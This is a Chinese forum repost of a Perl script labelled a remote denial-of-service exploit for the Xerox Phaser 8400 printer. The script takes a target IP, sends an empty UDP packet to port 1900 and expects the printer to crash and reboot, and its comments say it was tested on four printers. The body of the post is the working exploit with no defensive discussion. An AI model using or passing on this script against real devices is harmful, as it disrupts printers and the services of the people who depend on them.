• 设为首页
  • 收藏本站
  • 积分充值
  • VIP赞助
  • 手机版
  • 微博
  • 微信
    微信公众号 添加方式:
    1:搜索微信号(888888
    2:扫描左侧二维码
  • 快捷导航
    福建二哥 门户 查看主题

    Xerox Phaser 8400 (reboot) Remote Denial of Service Exploit

    发布者: 忻慕2619 | 发布时间: 2025-6-28 22:41| 查看数: 57| 评论数: 0|帖子模式

    #!/usr/bin/perl
    # carved-out by: crit3rion, just making th3 world a b3tt3r plac3!
    # Xerox_Remote_DoS.20080801.ver01 (tanx to dr0pz0N3 for reminding me to close my #$*&*! s0ck3t)
    # Make: Xerox
    # Model: Phaser 8400
    # Firmware: 03/03/2004
    #
    # What's the deal?
    # Apparently, if you send an empty packet to a Xerox Phaser 8400 printer
    # the printer will reboot.  Tested successfully on four printers.
    #

    # Let's not leave our maliciousness open to exploitation and errors!
    use strict;
    use warnings;
    use IO::Socket::INET;

    # What's your printer's IP Address?
    print "lease enter the printers IP:\n";
    my $ipaddr = <STDIN>;
    chomp $ipaddr;

    # Let's setup the connection...
    my $socket = IO::Socket::INET->new(
    PeerPort => 1900,
    PeerAddr => $ipaddr,
    Proto => "udp" )
    or die "I tried. Maybe you entered the wrong IP?\n Maybe it's just my bad code...\n In any case, check: $@\n\n";

    # Okay... Let's kill it.
    $socket->send("");
    $socket->close();

    print "Done. It should have died.\n\n";
    exit(1);


    来源:https://www.jb51.net/hack/5597.html
    免责声明:如果侵犯了您的权益,请联系站长,我们会及时删除侵权内容,谢谢合作!

    最新评论

    QQ Archiver 手机版 小黑屋 福建二哥 ( 闽ICP备2022004717号|闽公网安备35052402000345号 )

    Powered by Discuz! X3.5 © 2001-2023

    快速回复 返回顶部 返回列表